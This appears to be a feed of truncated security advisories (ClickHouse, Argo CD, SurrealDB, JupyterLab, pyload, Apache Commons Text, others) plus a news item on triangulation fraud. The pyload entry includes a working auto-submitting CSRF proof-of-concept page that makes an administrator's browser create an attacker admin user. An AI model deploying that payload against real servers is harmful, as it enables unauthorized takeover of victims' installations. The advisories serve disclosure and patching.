#auth

Exposure of sensitive information in exceptions in ClickHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.

### Impact The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.16 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain, such as [https://argo-cd.internal.example.com](https://argo-cd.example.com/). If an a...

SurrealDB depends on the `tungstenite` and `tokio-tungstenite` crates used by the `axum` crate, which handles connections to the SurrealDB WebSocket interface. On versions before `0.20.1`, the `tungstenite` crate presented an issue which allowed the parsing of HTTP headers during the client handshake to continuously consume high CPU when the headers were very long. All affected crates have been updated in SurrealDB version `1.1.0`. From the original advisory for [CVE-2023-43669](https://nvd.nist.gov/vuln/detail/CVE-2023-43669): "The Tungstenite crate through 0.20.0 for Rust allows remote attackers to cause a denial of service (minutes of CPU consumption) via an excessive length of an HTTP header in a client handshake. The length affects both how many times a parse is attempted (e.g., thousands of times) and the average amount of data for each parse attempt (e.g., millions of bytes)." ### Impact A remote unauthenticated attacker may cause a SurrealDB server that exposes its WebSocket...

### Impact Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. ### Patches JupyterLab 4.1.0b2, 4.0.11, and 3.6.7 were patched. ### Workarounds No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix. ### References Vulnerability reported by user @davwwwx via the [bug bounty program](https://app.intigriti.com/programs/jupyter/jupyter/detail) [sponsored by the European Commission](https://commission.europa.eu/news/european-commissions-open-source-programme-office-starts-bug-bounties-2022-01-19_en) and hosted on the [Intigriti platform](https://www.intigriti.com/).

A Canadian man who says he's been falsely charged with orchestrating a complex e-commerce scam is seeking to clear his name. His case appears to involve "triangulation fraud," which occurs when a consumer purchases something online -- from a seller on Amazon or eBay, for example -- but the seller doesn't actually own the item for sale. Instead, the seller purchases the item from an online retailer using stolen payment card data. In this scam, the unwitting buyer pays the scammer and receives what they ordered, and very often the only party left to dispute the transaction is the owner of the stolen payment card.

### Summary The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user. ### PoC We host the following HTML file on an attacker-controlled server. ```html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` If we now trick an administrator into visiting our malicious page at `https://attacker.com/CSRF.html`, we see that their browser will make a request to `/api/add_user/%22hacker%22,%22hacker%22`, adding ...

This Metasploit module exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to remote code execution. This is due to a logic flaw that makes the script, dns and url lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the script key. In order to exploit the vulnerabilities, the following requirements must be met: Run a version of Apache Commons Text from version 1.5 to 1.9, use the StringSubstitutor interpolator, and the target should run JDK versions prior to 15.

Lepton CMS version 7.0.0 suffers from a remote code execution vulnerability.

Red Hat Security Advisory 2024-0299-03 - An update for python-requests is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

MiniWeb HTTP Server version 0.8.1 remote denial of service exploit.